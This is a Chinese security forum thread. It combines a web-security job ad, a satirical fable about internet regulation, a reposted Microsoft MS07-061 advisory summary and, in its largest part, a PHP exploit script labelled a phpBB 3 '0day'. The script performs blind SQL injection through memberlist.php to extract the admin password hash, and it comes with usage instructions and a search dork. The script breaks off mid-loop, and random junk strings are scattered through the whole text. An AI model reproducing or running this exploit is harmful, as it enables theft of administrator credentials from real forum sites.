最近看过此主题的会员

返回列表 发帖

[人才招聘] [招聘] 绿盟科技(杭州办事处)招聘WEB安全测试/安全研究工程师

  • 招聘职位: 网络安全测试工程师
  • 公司名称: 绿盟科技
  • 工作地点: 江苏
  • 专业要求: 其他 
  • 学历要求: 文盲
  • 工作经验: 2年以上
  • 职位薪金: 面议
  • 年龄要求: 不限
  • 性别要求: 不限 
  • 公司网址: http://www.nsfocus.com
  • 简历邮箱: wangtuo@nsfocus.com
  • 联系电话: 114
  • 在线QQ: 10000
  • 安全助手: 通过非安全中国管理人员招聘/求职,QQ群:57116771


  • ++++++++++绿盟科技相关说明++++++++++

    招聘职位:WEB安全测试/安全研究攻城师
    3 |# U# S( e3 a人数:4人" ]$ `9 T4 a6 r4 k! b9 E
    工作地点:杭州( J* G' f8 `1 ?; W1 A# |- `7 R% }* j
    截止日期:2012年8月30日' C7 V7 T, Y1 T" q! @
    学历要求:本科或以上均可
    7 m# i! D& Q$ z2 F: {0 j& u. N岗位要求:
    4 t- V9 R1 d/ N1 P4 l& h1. 熟悉ASP/.NET/java/php等常见web代码;
    ( w# d9 l. V0 ]2. 精通或熟悉掌握php/perl/python/javascript/shell等一种或多种脚本语言;
    + _# y2 H& x1 E9 _3. 熟悉主流的Web安全技术,包括SQL注入,XSS,CSRF等安全风险;
    8 r" K, Z2 E' {8 d; Y+ K' `0 k4. 熟悉国内外主流WEB安全产品、工具,如:APPScan、Inspect、wvs等Web扫描工具;
    " `. D8 v- O& ~5 {5. 2年以上web安全工作经验,对web安全测试有自己的理解;
    + l& @+ x6 b7 F  B6 o+ }2 h. V6. 熟悉常见攻击和防御办法,熟悉web安全和渗透技术,能自行进行web渗透测试,WEB代码漏洞挖掘和分析。; c/ v  a2 D" B; N' q( g
    具备以下相关条件者将优先考虑:
    ; {  D4 P/ w6 u  R& x, S1.熟悉涉密信息系统以及相关技术要求;
      |6 g2 G% {+ h# j3 X: k2.熟悉防病毒、防火墙、VPN、入侵检测、漏洞扫描等信息安全系统工作原理及主流产品;! G6 Y6 v' p7 y# \5 p1 }
    3.熟练使用Linux操作系统,了解内核安全机制;: {  y4 `8 [& K+ G1 h
    4.有内网渗透经验,擅于独立挖掘web安全漏洞;1 X; O; q: u# ~. n; V5 P+ |
    5.对等级保护标准、评估流程等非常熟悉的优先;
    ' [. f  x: c4 ]% }" {6.对cisco、ids、ips等有一定 研究;9 {" g6 w5 I1 E- [9 T- }% B
    7.一年以上信息安全工作经验;
    , A$ v, w" j# Z8.具有网络、系统安全方面证书。
    . _! @3 o1 a8 e3 h4 d9.有一定的软件编程经验和逆向分析经验优先;
    ( O0 z/ V. x" C# j  D有兴趣请发简历到wangtuo@nsfocus.com
    非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
    2、本话题由:webmaster发表,本帖发表者webmaster符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
    3、其他单位或个人使用、转载或引用本帖时必须征得发表者webmaster和本站的同意;
    4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
    5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
    6、本站管理员和版主有权不事先通知发帖者而删除本文。

    河蟹、蜘蛛和蜗牛的故事
      河蟹:你这网备案了吗?  蜘蛛:啥,我织个网还要备案啊?  河蟹:当然要备案了,将来要是出个啥事,也能查到这是谁的网啊!  蜘蛛:……  河蟹:赶紧停下去备案,没有备案你的网就不能织,织好我也得给你剪断。  河蟹晃了晃他的两个大钳子,蜘蛛慌了神,赶紧屁颠屁颠跑去备案。蜘蛛还是第一次去这个部门,他发现该部门是一群蜗牛在负责。  好多天过去了,蜘蛛的备案还没拿到,去蜗牛那里问了好几次,都说正在处理。蜘蛛太饿了,于是偷偷织好了自己的网。  有一天早上起来,蜘蛛伸了个懒腰,去吃早餐,结果发现自己的网不见了。邻居们告诉他,河蟹二话不说,直接就把网给剪了。  蜘蛛很生气,真想找河蟹去拼命,可是想想河蟹的大钳子,还是作罢了。  好心的草泥马偷偷告诉蜘蛛,墙外边织网是不需要备案的。蜘蛛很高兴,虽然墙很高很高,他还是努力爬了过去。果然,墙外风和日丽,景色无限,重要的是没有可恶的河蟹来烦人。  可是时间长了,蜘蛛又开始有点怀念了,墙里面有些虫子美味又弱智,想起来就流口水。可惜这墙太高了,这些弱智的虫子不知道怎么飞出来。  于是蜘蛛翻过墙回来,果然不出他所料,蜗牛们已经审议通过了他的备案。蜘蛛迅速在老地方织了一张新网,墙内的虫子们真是又傻又美味啊!  有一天中午,蜘蛛突然感觉到他的网剧烈颤动,睁眼一看,一对正在xxoo的苍蝇不小心撞到了网上。蜘蛛已经吃饱了,正好正午骄阳似火烤得受不了,他笑着骂了一声“傻X”,就躲回洞里睡午觉去了。  迷糊中突然听见有人喊,蜘蛛揉着眼出来一看,原来是河蟹。  河蟹在下面指着那一对苍蝇,歇斯底里地朝他嚷:“你看看,你看看!多低俗!多色情!你有没有社会公德心啊?!你这多损害青少年身心健康你知道吗?”  说完,河蟹挥动自己的钳子,把蜘蛛的网剪了个粉碎。  蜘蛛心疼地看着被剪碎的网,心想:“我纳税养着你,你怎么能这么没人性呢。可是他又对河蟹无可奈何,一番思索之后,他和草泥马依依惜别,爬到了墙外。  蜘蛛从此过上了幸福的生活。
    2 f8 i2 Y) G' M2 _/ o
    人物:樱花浪子 BLOG地址:http://www.hacklu.net/

    ; a; u& n# i/ a- _
    " i! ?* ]) d$ D0 s- ~0 ]9 p4 a' D. F$ ^5 c  `1 `" y/ v% p

    5 l0 v5 b/ W. A: |
    9 g( T3 k+ d+ w6 U: O+ v5 Y6 W; b3 @7 w5 Y
    $ O& x  V; Y! o: E
    * T$ M* |. T! i. P% T

    7 f. Q2 {: e2 T2 ^; o
    - Z0 O7 P$ m  r9 a$ p' o. b( V7 z1 Q
    ; ^. [: d5 b( P  L
    ' ?) I( _7 r2 ?% C; z; g+ f! s! V# }, q8 u! _- C. R& z$ v

    * K7 c1 I2 s; s! h3 B* G  v- z! w3 w: s: k& H
    ; p6 N- ~. l$ s7 x6 i7 M
    5 ]! |: r8 f" B: Q! h0 }
    " u! v& C; e7 _
    0 g& b6 `) e% u3 d
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    已经证明:此贴有意思,而且非常有意思~  ( s0 Z. a/ V1 w. g
    # O4 N9 E' [8 y3 }

    ) K  r  b; q; H# p5 o" v; Y: t9 j& K& V

    2 C8 g6 R* T( h6 H8 h& s3 s. f( ?5 k) [, ]
    2 b3 x7 F1 h* Z  ]. E" H( p4 ?

    4 N" u+ F; D" i5 {2 y  r, S4 @3 }, b. n, H! O" O+ m
    - n; {6 V% R$ {

    $ k9 z7 ?, x* I: n) k, H5 g& }" \% b& i( b; w' B

    . |5 O* R, |- O3 f7 u
    6 v1 |# n+ [6 t2 w: A- r9 t8 S/ t$ V
    $ v- W( ~. i( @9 T: s4 L1 a2 ^$ g% v7 n' ~5 Z  _/ W

    6 t8 l/ U7 }0 ^. k1 D- I; x9 h0 H( H5 ?( n0 j9 }$ ]
    8 M* e- t- H  c' y# W" }
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    MS07-061:Windows URI处理中的远程执行代码漏洞
    发布日期: 十一月 13, 2007版本: 1.0

    ! d& ~$ a5 U& z  ?( y
    摘要

    2 H- E5 |( M) R  ^& T
    此更新可消除一个公开报告的漏洞。 Windows Shell 处理传递给它的特制 URI 的方式中存在一个远程执行代码漏洞。 如果 Windows Shell 没有充分验证这些 URI,则攻击者可能利用此漏洞并执行任意代码。 Microsoft 仅识别了在使用 Internet Explorer 7 的系统上利用此漏洞的方式。但是,Windows XP 和 Windows Server 2003 的所有受支持版本中包括的 Windows 文件 Shell32.dll 中存在该漏洞。

    / B- ~$ T: ?* K9 K
    建议。 Microsoft 建议用户立即应用此更新。
    / P1 b3 Z: X2 F2 ]+ q
    受影响的软件
    ; @4 B7 I! |& c6 D- E  S, d) e/ i% y
    操作系统 最大安全影响 综合严重程度等级 此更新替代的公告 Windows XP Service Pack 2 远程执行代码 严重 MS06-045 Windows XP Professional x64 Edition 和 Windows XP Professional x64 Edition Service Pack 2 远程执行代码 严重 MS06-045 Windows Server 2003 Service Pack 1 和 Windows Server 2003 Service Pack 2 远程执行代码 严重 MS06-045 Windows Server 2003 x64 Edition 和 Windows 2003 Server x64 Edition Service Pack 2 远程执行代码 严重 MS06-045 Windows Server 2003 SP1(用于基于 Itanium 的系统)以及 Windows Server 2003 SP2(用于基于 Itanium 的系统) 远程执行代码 严重 MS06-045

    * ^+ }  E7 j+ n- ~' j
    不受影响的软件
      |( r6 X& v, K5 l' o, N0 W
    操作系统 Microsoft Windows 2000 Service Pack 4 Windows Vista  Windows Vista x64
    ) l8 |# b" T8 W# L2 P
    微软的安全公告:

    ' z( }! C2 D/ J( Y
    http://www.microsoft.com/china/technet/security/bulletin/MS07-061.mspx
    0 k3 D6 i0 X& \- N& D$ R
    (以上链接均连到第三方网站)

    5 W: H( u0 h& W( H$ }" L' `: q2 u+ s2 |

      ~' S, q, a( z/ Q% I( `' T# m. v# Z4 \/ n2 V' o
    1 Q4 e" w0 r  O1 e+ H. w6 J1 j
    ! f  g( x' {! _7 H" e/ U3 a

      Q- M8 Q5 P; k- x9 L0 t2 G8 s) X+ y! d
    ! G/ R( W* }  n: Z' Z' o3 j# f" ]1 {

    ) y0 W4 L$ t: s0 Y1 b" o
    & q% |7 l, i0 v+ T7 w! v: \# w4 N, U! m
    1 g( Q9 @! o" }. x$ t4 L, K6 r2 k6 n/ A+ `$ R+ p9 j+ E
    & S) [8 i- U  A$ ~2 u" j0 T4 B9 \* A

    2 G8 V9 O) }$ p" ~% Z& F5 q9 }6 \! \
    & U! m. K: Z' a2 Y

    ' E, y+ Z' r2 E+ P! A. g) F" {* _4 ~% w. F$ ?  {! W! q6 Z7 J
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    PHPBB 3.0 0day漏洞放出
    #!/usr/bin/php -q -d short_open_tag=on
      d; T' l9 w% Q' v) M) ?<? 4 A: G# q' ~1 b' Y4 T
    echo "PhpBB 3 memberlist.php/'ip' argument SQL injection / admin credentials disclosure
    6 a3 g* s% l% F4 X1 G0 f+ O" K";
      V* A4 a. [  I- wecho "by Hackerz5 hackerz5x@yahoo.com
    . v; j( H1 S( Q! H4 A3 ^"; " V/ V( V* e# B7 R& o- D8 g4 s$ |
    echo "site: http://hackerz5.com; H) z6 D. _7 Y5 n
    "; 0 ?9 F- r8 t' ^+ B4 v( [" \
    echo "dork, version specific: "Powered by phpBB * 2002, 2006 phpBB Group"4 d0 C, g" M0 Y8 Q: h( N/ @; ^7 O- i1 a9 f
    " U8 B( `2 b. C( z, Y
    "; 7 b1 c) x  H. {! M- m9 n( w
    /* 0 P$ `2 ~+ q1 Q% N) ]/ `
    works regardless of php.ini settings : U" I) R0 r+ A/ s0 ^3 [8 u
    you need a global moderator account with "simple moderator" role / O; F1 v+ }6 Z
    */ ( U: ]0 A9 Q  c! S: f& L
    if ($argc<5) {
    9 _, n" C) G: b% lecho "Usage: php ".$argv[0]." host path user pass OPTIONS6 L3 u$ n7 e8 k( W" ]3 G1 @
    "; 4 f; ^8 }$ e3 o  M% S
    echo "host: target server (ip/hostname)
    7 Y. o8 a; v! _# N4 ]5 z9 `' F+ [";
      E, W# e9 K1 ~. t- I3 Cecho "path: path to phpbb39 _! S+ i- O2 ~, _) g: o8 a
    ";
    4 a! c% r+ q. x, z/ Z# P3 eecho "user/pass: u need a valid user account with global moderator rights
    ) \& `2 j3 k5 {0 j, U/ E1 e) {0 ["; 8 ?4 b$ j; n6 k
    echo "Options:
    9 U# ~! D' d  ["; , F" b9 B6 u6 S; F" H
    echo " -T[prefix] specify a table prefix different from default (phpbb_)9 ?9 X0 O1 @3 m  |
    "; ( w% m9 o# g  A" f+ [( F/ u$ U
    echo " -p[port]: specify a port other than 80
    % w" P, X, B& v/ F4 k";
    ( C) W8 V) N( z& d, ~1 r3 v0 `+ wecho " -P[ip:port]: specify a proxy( l/ G+ C1 e' s7 Y# B
    ";
    3 r' u7 H8 J$ D# V- Y5 Iecho " -u[number]: specify a user id other than 2 (admin)) I* c; {: u  X7 {- |9 Y2 ]7 d1 ~5 O
    "; * A+ \* e5 \5 J4 X, w4 C% w
    echo " -x: disclose table prefix through error messages9 i- S% Z5 }% x" b* V
    "; + f& C) n0 @% L6 G
    echo "Example:
    5 u" k: N2 O! A: H7 d6 P# j";
      C0 V" O; Q) w' v' ?3 a& H8 @  |% cecho "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-u
    ; Y2 A  d) H( p8 }9 I! F"; ( N6 q3 J7 u) ]$ v
    echo "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-u -TPHPBB_ -u7
    & v8 u# P0 @, `7 d0 x"; 3 q, k2 n+ X9 v; e
    die;
    " O9 x9 O$ j! ?8 a} 6 t* ~3 Z4 m; T# h+ E
    error_reporting(0);
    7 W& w" m  E1 E) M- ]2 B' N' wini_set("max_execution_time",0); ! ^- R' m! ~/ `6 i3 a
    ini_set("default_socket_timeout",5); ' |& W+ Q  I/ `( t
    function quick_dump($string)
    5 R% `1 Z" k; D9 K" V+ b. d# q{
    0 ?& ~  Z2 e( A( }! L# \2 J% L$result='';$exa='';$cont=0; / l) @6 R! ^3 A8 i! R: E6 i
    for ($i=0; $i<=strlen($string)-1; $i++) 9 t: X  j+ e/ }0 c7 C* y
    { 4 x) }# R5 }* h! W2 F
    if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
    4 g5 k7 y, r; C/ x8 j  _{$result.=" .";}
    + G, r. S+ Z+ s! E& oelse 4 A, p; T# O8 W3 A# Y5 X( Y0 H
    {$result.=" ".$string[$i];} 9 I9 L+ [5 f6 E2 [/ H* r
    if (strlen(dechex(ord($string[$i])))==2) . I! f' J  Y: w1 \- e
    {$exa.=" ".dechex(ord($string[$i]));}
    2 T* F3 a+ b$ L/ C/ a* W+ lelse - J, x3 f, C0 X4 {% c: O  }
    {$exa.=" 0".dechex(ord($string[$i]));} / e4 t% G" }* p: Y
    $cont++;if ($cont==15) {$cont=0; $result.="' o- k8 o7 W, b
    "; $exa.="" L* r. h3 L5 [8 l
    ";}
    3 e8 R9 y% u3 m5 {4 I: q5 s& X$ R} ) I( S! V' r+ i1 d5 f
    return $exa.", J  S- f3 H3 i) p; ^6 G, m4 }
    ".$result;
    % U& S# v8 X5 _* f# E( W}
    ( \, |. E3 E8 }/ W! W5 J" d2 @7 W$proxy_regex = '(d{1,3}.d{1,3}.d{1,3}.d{1,3}:d{1,5}) '; ( f5 M. q7 N/ `- A4 @: i4 O5 X8 [
    function sendpacketii($packet) # o; k* o- D& m8 y% C% H# o
    { : B/ _9 R7 Q$ ^( q) {
    global $proxy, $host, $port, $html, $proxy_regex; ! r* R2 D* h. |$ U1 T
    if ($proxy=='') { ) W* \( @3 `9 r
    $ock=fsockopen(gethostbyname($host),$port); , a  _" T( D! @
    if (!$ock) { , `6 X" o. u( r1 x' w. z
    echo 'No response from '.$host.':'.$port; die;
    - @# w& o7 D0 K( Q} % g+ A4 f; T9 c' W, r
    } 7 H9 o; h. O- \) ?2 v$ m/ \
    else {
    % x4 |) P: @. A! a' h& o$c = preg_match($proxy_regex,$proxy);
    2 h: s/ v3 v6 ]. L( e/ g0 P1 rif (!$c) {
    ; D* J( R5 e2 C5 Oecho 'Not a valid proxy...';die; ' d7 p' b, T  @& A0 r
    } 0 Z  H7 o+ i8 y* \
    $parts=explode(':',$proxy);
    . j$ {9 m, I) E9 u' Vecho "Connecting to ".$parts[0].":".$parts[1]." proxy...& Y; A! O3 @; b, a) D8 z0 j
    "; ( s& q. T: ?+ c) I) s# q& a
    $ock=fsockopen($parts[0],$parts[1]);
    ; B- b4 a8 {  N- ?$ }8 Q* Nif (!$ock) { 8 Q0 |8 L( g$ _( c) z2 B' N
    echo 'No response from proxy...';die;
    # K$ @. d( m) W+ G; P- {, y}
    5 F& Q- o8 N7 i/ H} 3 b1 H- H, V4 O# G- P7 M
    fputs($ock,$packet); 4 U2 T/ n- C% d3 a, G3 x- k
    if ($proxy=='') { ; {4 j  n# {6 S6 @+ b) D) [
    $html='';   {# S; |( i# u% s- u
    while (!feof($ock)) {
    ; O& x: Q5 Y- B/ y; R9 r$ j$html.=fgets($ock);
    & ^0 r( w" g5 t: R: ]- @) Y}
    7 f6 p0 B6 m. I. I) p, M}
    ) `! F/ x! p" Y- j* velse {
    ( @& b# p. g! t; y$html='';
    + v1 m- f; x. n; pwhile ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$h tml))) { $ r( D9 D  [: c9 b5 V! E& }- i6 T  d+ ^
    $html.=fread($ock,1);
    # |6 o; I( {" [; c* ^% [5 w; {, y}
    8 ~- h, x! G; H' g+ M, y2 Q" t}
    : f6 X  f4 Y) hfclose($ock); 4 {) l  x% f0 D) Y+ D
    #debug % F; ^( e& Q! e' S6 t# \' v- |% J
    #echo "+ k; k! N5 K9 ~. a
    ".$html; 0 A) W- ^! K5 t2 g( F( n
    }
    ' e( Q2 L; F% U9 A- P$host=$argv[1]; / B7 f3 u9 y3 Q% U
    $path=$argv[2]; " F" u$ R4 ]: K3 L# T8 U
    $user=$argv[3]; " {. Q4 [, k* y% p" o! j* N
    $pass=$argv[4];
    6 e8 I- [4 ?  e4 |. v( o/ i$port=80; 0 K$ D) \. i, W+ N1 d0 b7 l+ c2 {
    $prefix="PHPBB_"; $ S/ G' j. D$ e2 ], s6 G
    $user_id="2";//admin 1 G: S* H' C$ ]
    $discl=0; & C4 x; q" J9 J  q& ]
    $proxy="";
    . @3 n% i) }* z; {/ O; T4 ^+ nfor ($i=3; $i<=$argc-1; $i++){
    - }1 ^& V# `7 A' B# [$ |5 j, D$temp=$argv[$i][0].$argv[$i][1]; 8 i6 n  V% T4 x
    if ($temp=="-p")
    4 y: c9 m' G1 W' ~! T0 t4 b0 M3 V4 W{ $ z1 N% k" a1 K8 k9 a
    $port=str_replace("-p","",$argv[$i]);
    ' [  I' w; C+ f5 v  T}
    0 ]& D* T6 r5 s3 jif ($temp=="-P")
      \/ U  v# I6 Z{ ! ~6 C/ `! k0 x
    $proxy=str_replace("-P","",$argv[$i]); 6 P% p0 `# m( R- x4 E
    }   n# R+ w: t3 @) b" N
    if ($temp=="-T")
    , X( @, P# g' |' A. T{ % O! b0 q1 A# e& O
    $prefix=str_replace("-T","",$argv[$i]); 9 Y' G7 K' s2 w$ _
    }
    : M3 H+ R6 J5 m/ Kif ($temp=="-u") % v4 X. ^: O1 g  Y1 N
    { 0 ]' F- R$ t, Y: S
    $user_id=str_replace("-u","",$argv[$i]); + p4 J# x  ~* a+ @
    }
    % S/ m$ E& e4 j# x! p+ [if ($temp=="-x")
    3 N. |# L& U9 Y# f- d% t{
    3 ^( I9 i' V, r) o  n* h$discl=1; 6 b9 R4 z2 c. N( f2 i. o
    } ' Z9 {" a  s0 I' r: x
    } / A6 A7 O! f' t
    if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
    8 ]! S7 [2 @' X% c* Oif ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} 9 V: S- P3 d* c6 }! e- i
    $data="username=".urlencode($user); $ b  K5 D/ E. [7 \
    $data.="&amp;password=".urlencode($pass); 3 B& e0 i# @3 O, e3 ^  c: ?
    $data.="&amp;redirect=index.php"; 2 P/ g" }! N% F
    $data.="&amp;login=Login"; 6 q" I$ o8 W/ Z2 T- x( J( b" o  N
    $packet="POST ".$p."ucp.php?mode=login HTTP/1.0  Q) g3 ~' o/ T' O9 O/ p
    ";
    * u  C" m" ~- \9 U5 a# F; S! w! Q$packet.="Referer: http://$host$path/ucp.php?mode=login
    ! U) Q1 Y6 U% g6 A. [";
    & a( x' P+ [2 P$packet.="Content-Type: application/x-www-form-urlencoded8 p' B' y+ l% h5 Q7 E; g9 Y
    ";
    2 q0 Q% m) R( y1 s; o  h1 S$packet.="Accept-Encoding: text/plain
    % T! L3 M+ k8 F8 n! B0 n' ], ^"; $ A. _$ E0 [7 g! R0 b
    $packet.="Host: ".$host."" u6 Z: @, p- @, a
    ";
    & g5 N% O5 x: m2 k$packet.="Content-Length: ".strlen($data)."
    $ [7 n) t0 K4 ?$ x* G- @2 Q2 }";
    9 Q4 p9 d+ p3 K8 d# v3 ^3 ~$packet.="Connection: Close
    ! G+ P5 U$ n9 P# _+ F: F2 ~
    0 P, G8 C# G6 t: i. H; u: ^  V";
    - t5 u2 @! S% V, [$packet.=$data;
      J- l! h/ `1 D5 y5 ]" r; y# jsendpacketii($packet); 4 I! w! Y4 F: x% ^; P
    $cookie=""; % [& L8 q- x5 [
    $temp=explode("Set-Cookie: ",$html); $ H' I" \- q) d# D7 N
    for ($i=1; $i<=count($temp)-1; $i++)
    ' J3 M% Y# |) {* ~3 g( V$ Q" |' K7 H{ 9 U# \5 B. {  k7 b( }) N2 w, y
    $temp2=explode(" ",$temp[$i]); 5 J6 ^+ @! d3 X8 d
    $cookie.=" ".$temp2[0]; ; k; w7 Q. n9 ?3 h$ n) l
    } * U  F& r- f3 [; H( l" C
    if (eregi("_u=1;",$cookie)) / w5 q% e- }/ R5 A0 Q( s
    { 6 o) ?0 W' z8 F3 Y3 L
    //echo $html."1 U. [4 h9 C( f3 e- T( a( {
    ";//debug
      c; h, n  m- v7 r& M" Q; N/ M//die("Unable to login...");
    3 ~4 u. x3 r0 P1 c" s' O}
    5 v8 r- M  B) B" Mecho "cookie -> ".$cookie."7 u8 u' Q' A+ R) |0 b6 S
    ";
    4 ~, }0 B& S# X1 }$ }if ($discl)
      K, j  [8 r1 M) Y' f# _{ 9 W$ Z$ E, i* g; x1 I. F
    $sql="'suntzuuuuu"; # U5 D2 T$ b6 a) X, r
    echo "sql -> ".$sql."
    ' [* n2 u) V' p9 p8 S6 K% ?  m# X" j";
    9 K# F' n+ l1 N( c+ G- [( Z$sql=urlencode(strtoupper($sql)); 3 D; t1 b/ b( T& p
    $data="username="; 9 [& V) ^$ Y8 c' c' _& K1 N: h
    $data.="&amp;icq="; 3 }( r0 {8 j+ @5 h  B2 r
    $data.="&amp;email="; : `: r" Z6 h/ Z0 L
    $data.="&amp;aim="; , X5 F7 }! M' ?- g$ O+ o
    $data.="&amp;joined_select=lt"; : u' @' r- O7 A+ w' U
    $data.="&amp;joined=";
    4 P# Y% W- h; |! L, Y$data.="&amp;yahoo=";
    - Z, Z1 B" Z) f4 F$data.="&amp;active_select=lt";
    2 m  b2 T3 e$ Q$data.="&amp;active=";
    0 x" [; n" [1 j) M" G% Q% o5 _% a  q+ _$data.="&amp;msn="; 7 o3 S7 j7 {& H. t5 k( Z  r: r
    $data.="&amp;count_select=eq";
    : w8 ]% D: N6 [; @! z$data.="&amp;count=";
    4 `* P' \. O0 G8 K. Y$data.="&amp;jabber="; ) u& H& F" [+ ]7 o4 m- ^3 u$ H
    $data.="&amp;sk=c"; ' ?, G1 M2 z0 O* J! p" {; h
    $data.="&amp;sd=a"; & n6 ]* t/ x; @0 t
    $data.="&amp;ip=".$sql;
    # [1 ^( m6 c- G1 [$data.="&amp;search_group_id=0";
    5 H5 c, X* f# d6 \  i7 u$data.="&amp;submit=Search";
    4 s- E3 P0 q* e& E, M' z8 a$packet="POST ".$p."memberlist.php?joined_select=lt&amp;active_selec t=lt&amp;count_select=eq&amp;sk=c&amp;sd=a&amp;ip=%5C%27&amp;form=post &amp;field=username_list&amp;mode=searchuser&amp;form=post HTTP/1.0
    & C5 X* c8 d% ?* l2 V7 h";
    " _3 L, r$ u" W4 y$packet.="Content-Type: application/x-www-form-urlencoded
    0 J  S( l) ~- x1 N  i- x/ N7 s) Y"; : u6 U1 ?  t. ?( U
    $packet.="Host: ".$host."
    # V5 u2 B- y# ?" z4 ["; , |( f- z4 t7 m* x' V& o
    $packet.="Content-Length: ".strlen($data)."8 \5 ]# P  X2 N' t+ p  W5 Q
    "; / o6 X8 ~( Q) `. L
    $packet.="Connection: Close  Y, b5 K0 U4 p* s) J1 E
    "; : j- G! q" {6 F; L6 q; T
    $packet.="Cookie: ".$cookie." % U! {+ D# {  k; \5 z7 v
    , d! O+ ~/ z# m4 r& ?, c
    "; 1 @8 |: O1 g+ E! z2 p! j7 e
    $packet.=$data; - p, Y: o5 r7 v  @% _7 O7 i) G
    sendpacketii($packet); / R4 V& Q+ p% |7 N3 n: a
    if (strstr($html,"You have an error in your SQL syntax")) 1 F" I1 G4 x1 i( {1 H
    {   g7 i2 S; v+ J2 e9 M- W
    $temp=explode("posts",$html); 6 E6 |! e6 E8 i5 ~4 T" T
    $temp2=explode(" ",$temp[0]); 7 q' ]% C' z$ a+ x' d8 l0 Z
    $prefix=strtoupper($temp2[count($temp2)-1]); $ {+ g+ Q& ]5 ?8 D3 i! ]6 j
    echo "prefix -> ".$prefix."
    6 P! T5 ~/ ^  p";sleep(2);
    # G$ w- e. j* I* L6 e/ q' n}
    " b0 y# w, T5 r( S+ I. Z} + N$ J; \" K0 L- H/ ^+ s
    $md5s[0]=0;//null
    " S/ t2 @0 O6 e2 ^$md5s=array_merge($md5s,range(48,57)); //numbers   P4 f3 S7 o9 o" _& N
    $md5s=array_merge($md5s,range(97,102));//a-f letters
    ! }+ N$ Y& [7 i% C3 o//print_r(array_values($md5s)); * \( A& A( |5 X3 J  ^
    $j=1;$password=""; & b$ V. o0 Q; e+ [
    while (!strstr($password,chr(0)))
    * Q& I6 |7 {0 N! O8 c{ " J0 K( |8 P' Y; X, J. m
    for ($i=0; $i<=255; $i++) ( j1 M+ j' `$ z6 p8 {9 a2 [
    {
    2 r+ X9 I) q# Q5 vif (in_array($i,$md5s))
    # o  U$ }2 g4 a! f{
    / {: l& U& ^/ w/ @+ x, f$sql="1.1.1.999') UNION SELECT IF ((ASCII(SUBSTRING(USER_PASSWORD,".$j.",1))=$i),$us er_id,-1) FROM ".$prefix."USERS WHERE USER_ID=$user_id UNION SELECT POSTER_ID FROM ".$prefix."POSTS WHERE POSTER_IP IN ('1.1.1.999"; 6 |) o; B# T* C' J/ O# D4 Z; l
    echo "sql -> ".$sql."
    - I3 R" K- Q% m4 H";
    , V0 I" x, T7 h. d8 E+ p! ~8 X$sql=urlencode(strtoupper($sql)); . I# y* ^1 J. t$ |6 h
    $data="username="; 1 a, L% Q2 A8 H
    $data.="&amp;icq="; , \! f1 v; C$ C/ x3 b
    $data.="&amp;email=";
    1 Y" S# S- Q" J$data.="&amp;aim=";
    - [3 E; n5 ~/ ?5 W4 C3 m% h$data.="&amp;joined_select=lt";
    2 y2 \) h6 ]/ @, n. t8 Z" l$data.="&amp;joined="; & z- R& O) [; [7 I$ i" ^4 _
    $data.="&amp;yahoo=";
    - x5 Z3 E. q; f* }$data.="&amp;active_select=lt"; * s3 O+ _: ]- H7 J1 d" y" Q5 ?! q; Y8 e
    $data.="&amp;active="; * J, m) q+ X: F
    $data.="&amp;msn=";
    & R3 f/ r8 Y0 V! w  V8 g$data.="&amp;count_select=eq"; 8 x8 r; m7 V. u" O1 f7 u8 P
    $data.="&amp;count=";
    6 Z/ A/ A* D3 ]$data.="&amp;jabber="; : d# v, E* N  ]! {
    $data.="&amp;sk=c";
      ^9 N' p7 \& h* k( i7 b% h$data.="&amp;sd=a"; & x2 n; J* Q" |7 C3 o6 t* m
    $data.="&amp;ip=".$sql; ( c# L: K& f% K1 Z6 w- z
    $data.="&amp;search_group_id=0"; ' t* }& k% u( _2 G
    $data.="&amp;submit=Search";
    ; e( {3 p1 v! B1 T! x$packet="POST ".$p."memberlist.php?joined_select=lt&amp;active_selec t=lt&amp;count_select=eq&amp;sk=c&amp;sd=a&amp;ip=%5C%27&amp;form=post &amp;field=username_list&amp;mode=searchuser&amp;form=post HTTP/1.0* j; P! Z" z3 ?  Y: p, i2 ^, b( V
    ";
    6 n6 Y( m) B: V$ w. f$packet.="Content-Type: application/x-www-form-urlencoded
    . H# G: U6 Z: A& e/ w7 _"; 5 x3 P! L. e1 t* z
    $packet.="Host: ".$host."' s7 b* U( ]) b8 D
    ";
    8 Q- D, j+ j, F: G# Z$packet.="Content-Length: ".strlen($data)."
    3 Z+ b7 X, N, U% Z' ]3 G"; 9 H. Q+ t# A4 ^8 n
    $packet.="Connection: Close  P3 Q- M& ~; e9 c4 p2 I
    ";
    % p) z0 J, Y5 d$ `. V# s$packet.="Cookie: ".$cookie." $ B) i- e) A4 ~: g# y
    ! m$ i% Q3 I$ v- D) p/ R8 |$ v, ]
    "; ; J1 [" a& |5 \& `
    $packet.=$data; ' l- }' m1 C- s- D3 ^% T
    sendpacketii($packet); # d. P( L: |0 V
    if (!strstr($html,"No members found for this search criteria")) {$password.=chr($i);echo "password -> ".$password."[???]* W% {/ p( k8 [, K. \" b6 J
    ";sleep(2);break;}
      ~2 ]8 Y4 `  ]. r- P5 v+ ~}
    % `' Y, ?, V- s  z9 a. Iif ($i==255) {die("Exploit failed...");} ; Z( x# ~+ j% x. d$ ^& }: x
    } . v! u) Q) f6 E" l
    $j++;
    8 b1 t% Z# u6 Q. w$ g}
    " x0 U4 I9 s3 U( S' a% m3 R! h$j=1;$admin="";   P( D# n% d+ y& k3 q& n
    while (!strstr($admin,chr(0))) % e& D, ]# w# t/ H/ {  {/ Z
    {
    4 y+ ~8 J( H- Gfor ($i=0; $i<=255; $i++)
    / H  y+ F( `6 n+ D{
